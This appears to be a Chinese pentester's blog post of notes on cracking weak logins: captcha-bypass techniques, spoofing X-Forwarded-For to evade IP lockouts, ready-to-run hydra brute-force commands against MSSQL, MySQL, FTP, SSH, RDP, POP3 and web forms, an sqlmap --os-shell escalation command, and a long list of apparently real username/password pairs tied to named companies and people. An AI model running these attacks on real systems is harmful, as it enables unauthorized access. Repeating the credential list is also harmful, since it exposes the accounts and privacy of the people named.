弱口令

相关文章

https://github.com/Gamma-laboratory/JsFak  --selenium模拟爆破绕过JS加密

 

验证码

验证码泄露
网站的源码中
请求的Cookie中

爆破
无条件不刷新 -验证码固定 - 直接爆破
有条件不刷新(如客户端通过js生成)- 验证码在前端校验-抓包爆破
验证码自动识别
通过接口返回验证码-接口唯一/验证码不唯一(Java一般以.do结尾)- 使用工具PKAV HTTP FUzzer 和 Burpsuite 爆破

burpsuite插件 reCAPTCHA

六位数验证码
https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2012-014618

Geetest滑动验证码

https://www.freebuf.com/articles/web/140693.html


绕过IP限制爆破 - PHP - 客户端重写HTTP_X_FORWARDED_FOR

$onlineip = '';
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}

return $onlineip;
View Code

hydra - Windows

mssql    
hydra.exe -l sa -P c:\pass.txt 192.168.1.110 mssql    
mysql    
hydra.exe -L c:\user.txt -P c:\pass.txt 192.168.1.110 mysql    
FTP    
hydra.exe -l admin -P c:\pass.txt -t 5 192.168.1.110 ftp    
ssh    
hydra.exe -L users.txt -P password.txt -e n -t 5 -vV 192.168.1.110 ssh    
rdp    
hydra.exe -l administrator -P c:\pass.txt www.xxser.com rdp -V    
pop3    
hydra.exe -l root -P pass.txt my.pop3.mail pop3    
sqlmap.py -d "mssql://sa:pwd@123@192.168.1.110:1433/master" --os-shell    sqlmap通过密码提权
Post登录    
hydra -l admin -P pwd.txt -v IP http-post-form "/:username=^USER^&password=^PASS^&this_is_the=data&next=:<title>| Django site admin</title>"    

 hydra - Linux

root@kali:/home/SmithEcon/Dictionary# hydra -L mysqluser.txt -P mysqluser.txt 120.240.xx.162 mysql

hydra 150.xx.64.81 rdp -L rdpuser.txt -P rdppwd.txt -V
#cookier验证访问,可轻松绕过从而实施各种弱口令的账户暴破

#使用PHPSESSID进行验证码验证-》将PHPSESSID设置为固定值-》爆破

常见弱口令

网站后台
ouou/123456
admin/a123456
test/a123456
lifeng/123456
620723105/1111
admin/ironport
root/111111
admin/1
xiangming.zhangxm/jpfxbhxm
admin/alibabatw
test/test
chenhua/Qwer1234
zengxiaomin/123456
wangqian/wangqian123
adminzbird/zbird@tudou
root/dazhong
luyicheng/zhuzhu521
test/1qaz2wsx
panda/panda
qinxiaobo/Qwer1234
chenhua/Qwer1234
huangjunjie/fucknima
liuxiaohui/Aa123456
tangjun/tangjun
tudou/tudou123456
test/Ab123456
liu.juan/@WSX3edc
youku/youku888
test/test123
fanghui/!QAZ2wsx
project/7b2c5b51ec9e
zhangqin/zq!@#123
samo/901107
wenjianbin/2wsx#EDC
wenjianbin/123456Asd!@#
pingpinganan/yishengpingan
username/password
hongchuan/hongchuan
steven135904/123456
youku/123456
zhangqin/zq!@#123
baochan flyinghorse shiwei laowu ying.liuying jobs xin.zhouzx/123456
密码:hello1234
密码:p@ssw0rd
密码:1q2w3e4r5t
密码:ZAQ!2wsx
密码:949389
密码:901107
密码:1234567
密码: abc=3.14
密码:Asdf1234
密码:youku@123
陈梦宜/1
章继宗/1 
admin/1
┼攠數畣整爠煥敵瑳∨≡┩愾/a
中文姓名/姓名首字母+2014
用户名为公司邮件地址 @ 前的部分,密码为空 (RTX)
dazhong/dazhong 
用户名:admin')
密码:asdkjflkj 随便输入 可直接登陆
zb-bs-zhangxiaoxiang/12345678
tangjun/tangjun
shencheng/123456
Mysql数据库
root/root
数据库 bpm
/ca apollo/ca bpm/bpm apollo/kissqa
主机 nathan.yuhm
/rNQzpwXH pass/hello12345

 

弱口令检测开源项目

https://github.com/shack2/SNETCracker

 

配合逻辑漏洞暴力破解

如果带有cookie,则无论如何提交账号,都返回空,删除cookie后,正常提交,服务器返回正常账号状态,
手工删除cookie使用hy1XXXXX格式的id,可组合12345678、admin123、password等弱口令进行批量猜测账号
posted @ 2019-07-19 17:14  7hang  阅读(785)  评论(0编辑  收藏  举报